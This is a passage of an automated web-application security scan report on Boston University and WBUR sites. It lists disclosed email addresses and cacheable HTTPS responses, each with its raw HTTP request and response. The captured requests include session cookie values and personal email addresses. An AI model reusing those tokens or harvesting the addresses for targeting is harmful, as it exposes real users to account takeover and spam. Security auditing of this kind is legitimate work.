<a href="mailto:ithelp@bu.edu">ithelp@bu.edu</a>
...[SNIP]...

10.19. https://www.bu.edu/tech/services/researchers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/researchers/

Issue detail

The following email address was disclosed in the response:

Request

GET /tech/services/researchers/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:18 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:30:17 GMT
Accept-Ranges: bytes
Content-Length: 98337
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:18 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiOgrxHDYAAGJWsPgAAAFY
X-BU-Duration: D=9158
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<a href="mailto:ithelp@bu.edu">ithelp@bu.edu</a>
...[SNIP]...

10.20. https://www.bu.edu/tech/services/staff/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/staff/

Issue detail

The following email address was disclosed in the response:

Request

GET /tech/services/staff/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:19 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:30:18 GMT
Accept-Ranges: bytes
Content-Length: 104691
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:19 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiOwrxHDYAAGJVrSYAAAHG
X-BU-Duration: D=23961
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<a href="mailto:ithelp@bu.edu">ithelp@bu.edu</a>
...[SNIP]...

10.21. https://www.bu.edu/tech/services/students/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/students/

Issue detail

The following email address was disclosed in the response:

Request

GET /tech/services/students/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:16 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:28:45 GMT
Accept-Ranges: bytes
Content-Length: 92477
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:16 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiOArxHDYAAGUNvMsAAAMY
X-BU-Duration: D=10392
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<a href="mailto:ithelp@bu.edu">ithelp@bu.edu</a>
...[SNIP]...

10.22. http://www.wbur.org/about/jobs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /about/jobs

Issue detail

The following email address was disclosed in the response:

Request

GET /about/jobs HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:41 GMT
Connection: close
Content-Length: 34737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a href="mailto:jwong@wbur.org">jwong@wbur.org</a>
...[SNIP]...

10.23. http://www.wbur.org/about/privacy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /about/privacy

Issue detail

The following email address was disclosed in the response:

Request

GET /about/privacy HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:41 GMT
Connection: close
Content-Length: 34168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a href="mailto:webmaster@wbur.org">webmaster@wbur.org</a>
...[SNIP]...

10.24. http://www.wbur.org/about/reporting-copyright-infringement  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /about/reporting-copyright-infringement

Issue detail

The following email address was disclosed in the response:

Request

GET /about/reporting-copyright-infringement HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:42 GMT
Connection: close
Content-Length: 37436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a href="mailto:dmca@bu.edu">dmca@bu.edu</a>
...[SNIP]...

10.25. http://www.wbur.org/contact  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /contact

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contact HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:39 GMT
Connection: close
Content-Length: 34582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a href="mailto:info@wbur.org">info@wbur.org<br />
...[SNIP]...
<a href="mailto:pledge@wbur.org">pledge@wbur.org</a>
...[SNIP]...
<a href="mailto:wburnews@wbur.org">wburnews@wbur.org<br />
...[SNIP]...
<a href="mailto:webmaster@wbur.org">webmaster@wbur.org</a>
...[SNIP]...
<a href="mailto:jlicopol@wbur.bu.edu">jlicopol@wbur.bu.edu</a>
...[SNIP]...
<a href="mailto:talentrequest@wbur.org">talentrequest@wbur.org</a>
...[SNIP]...

10.26. http://www.wbur.org/support/newsmaker  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /support/newsmaker

Issue detail

The following email address was disclosed in the response:

Request

GET /support/newsmaker HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:34 GMT
Connection: close
Content-Length: 46173


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="mailto:ccavanau@wbur.org">ccavanau@wbur.org</a>
...[SNIP]...
<a href="mailto:ccavanau@wbur.org">ccavanau@wbur.org</a>
...[SNIP]...

10.27. http://www.wbur.org/support/upcoming-events  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /support/upcoming-events

Issue detail

The following email address was disclosed in the response:

Request

GET /support/upcoming-events HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:33 GMT
Connection: close
Content-Length: 42302


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="mailto:events@wbur.org">events@wbur.org</a>
...[SNIP]...

10.28. http://www.wbur.org/support/volunteer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /support/volunteer

Issue detail

The following email addresses were disclosed in the response:

Request

GET /support/volunteer HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:34 GMT
Connection: close
Content-Length: 52965


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="mailto:volunteer@wbur.org">volunteer@wbur.org</a>
...[SNIP]...
<a href="mailto:info@oldcornerbooks.com">info@oldcornerbooks.com</a>
...[SNIP]...
<a href="mailto:Purple.Dragons@verizon.net">Purple.Dragons@verizon.net</a>
...[SNIP]...
<a href="mailto:spottedsalamander@verizon.net">spottedsalamander@verizon.net</a>
...[SNIP]...

11. Cacheable HTTPS response  previous  next
There are 26 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


11.1. https://weblogin.bu.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; isMobile=false_1.1; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:48:03 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Wed, 01 Jun 2005 12:35:47 GMT
ETag: "41bd040100b7-e36-3f87a5c37eec0"
Accept-Ranges: bytes
Content-Length: 3638
X-BU-Main-Uniqueid: ToyYUwrxHDsAAE03@Z8AAAAM
X-BU-Duration: D=7732
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/plain

..............h...&... ..............(....... ...........@...........................XX..........rrr.....''........==................................................................................
...[SNIP]...

11.2. https://weblogin.bu.edu/webnew/alumnew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /webnew/alumnew

Request

GET /webnew/alumnew HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bu.edu/alumni/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; credsrv3=cussp-srv4; wl4data=1361f4db6536328d0e4837bb82138064%3Acussp-srv4%2Ckey%3D1317837446.11881; wl4cap=1317837588%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; bu_session=a48b5fc44e9c3778dbfa93d21a2f878d%3Acussp-srv3; isMobile=false_1.2; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.20.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:05:25 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Content-Type: text/html; charset=ISO-8859-1
X-BU-Main-Uniqueid: ToycZQrxHDsAAFwVZ3oAAAAS
X-BU-Duration: D=16292141
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 29113


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_ddmenu_sidenav.dwt" codeOutsideHTMLIsLocked=
...[SNIP]...

11.3. https://www.bu.edu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /

Request

GET / HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:15 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Accept-Ranges: bytes
X-BU-Main-Uniqueid: ToyiNwrxHDYAAGKAtakAAABD
X-BU-Duration: D=7079
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...

11.4. https://www.bu.edu/alumni-forms/forms/annualfund/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /alumni-forms/forms/annualfund/index.html

Request

GET /alumni-forms/forms/annualfund/index.html HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:31:01 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 23 Feb 2011 16:23:26 GMT
ETag: "1bd4002400001234-e39a-49cf584379bbe"
Accept-Ranges: bytes
Content-Length: 58266
X-BU-Main-Uniqueid: ToyiZQrxHDYAAGUNv00AAAMX
X-BU-Duration: D=13739
X-BU-Backend: content_default (null)
Content-Type: text/html
Via: 1.1 www.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin templat
...[SNIP]...

11.5. https://www.bu.edu/alumni-forms/forms/ath/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /alumni-forms/forms/ath/

Request

GET /alumni-forms/forms/ath/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:31:01 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Wed, 30 Mar 2011 20:35:24 GMT
ETag: "1bd4014400001234-1423b-49fb91dc41b58"
Accept-Ranges: bytes
Content-Length: 82491
X-BU-Main-Uniqueid: ToyiZQrxHDYAAGVNx3UAAAOV
X-BU-Duration: D=19114
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equi
...[SNIP]...

11.6. https://www.bu.edu/alumni-forms/forms/giving/online/index/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /alumni-forms/forms/giving/online/index/

Request

GET /alumni-forms/forms/giving/online/index/ HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bu.edu/alumni/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.18.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:01:13 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Tue, 24 May 2011 14:44:12 GMT
ETag: "1bd400b200001234-e4a5-4a4069f0c8744"
Accept-Ranges: bytes
Content-Length: 58533
X-BU-Main-Uniqueid: ToybaQrxHDYAAEndiNsAAAWQ
X-BU-Duration: D=12581
X-BU-Backend: (null) (null)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin templat
...[SNIP]...

11.7. https://www.bu.edu/alumni/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /alumni/

Request

GET /alumni/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:31:02 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:21:08 GMT
Accept-Ranges: bytes
Content-Length: 19106
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:36:02 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiZgrxHDYAAGUNv1QAAAMR
X-BU-Duration: D=12731
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...

11.8. https://www.bu.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:59:42 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Wed, 30 Jan 2008 00:16:42 GMT
ETag: "1bf308d800001234-13e-444e574a4ce83"
Accept-Ranges: bytes
Content-Length: 318
X-BU-Main-Uniqueid: ToybDgrxHDYAAEaPWxgAAATW
X-BU-Duration: D=5560
X-BU-Backend: (null) (null)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain

..............(.......(....... .......................................``..ff..................................................wwwwwwwwwwwwwwww.........................Ww07w0...0qt.p...0pr.p...v0r.p...
...[SNIP]...

11.9. https://www.bu.edu/help/tech/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /help/tech/

Request

GET /help/tech/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:39 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Mon, 02 Aug 2010 15:28:10 GMT
ETag: "1420053200001234-2ea2-48cd8d9199681"
Accept-Ranges: bytes
Content-Length: 11938
X-BU-Main-Uniqueid: ToyiTwrxHDYAAGJVrjsAAAHQ
X-BU-Duration: D=9453
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

11.10. https://www.bu.edu/help/tech/qa/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /help/tech/qa/

Request

GET /help/tech/qa/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:40 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Wed, 02 Mar 2011 16:29:08 GMT
ETag: "1420040800001234-1b28-49d82697dbd01"
Accept-Ranges: bytes
Content-Length: 6952
X-BU-Main-Uniqueid: ToyiUArxHDYAAGUNvhkAAAMS
X-BU-Duration: D=12629
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-eq
...[SNIP]...

11.11. https://www.bu.edu/link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin

Request

GET /link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:14 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiNgrxHDYAAGUMufoAAAKF
X-BU-Duration: D=168596
X-BU-Backend: builtin (null)
Connection: close

<HTML>
<HEAD><TITLE>System Error</TITLE></HEAD>
<BODY TEXT="black" LINK="blue" VLINK="blue">
<CENTER>
<TABLE BORDER=0 CELLPADDING=2 WIDTH=60% BGCOLOR=FF00FF>
<TR><TD><TABLE CELLSPACING=0 CELLPADDING=4
...[SNIP]...

11.12. https://www.bu.edu/link/bin/uiscgi_studentlink  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /link/bin/uiscgi_studentlink

Request

GET /link/bin/uiscgi_studentlink HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 17:47:35 GMT
Server: Apache/2.2.0 (BU-Version1)
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Content-Type: text/html
Via: 1.1 www.bu.edu
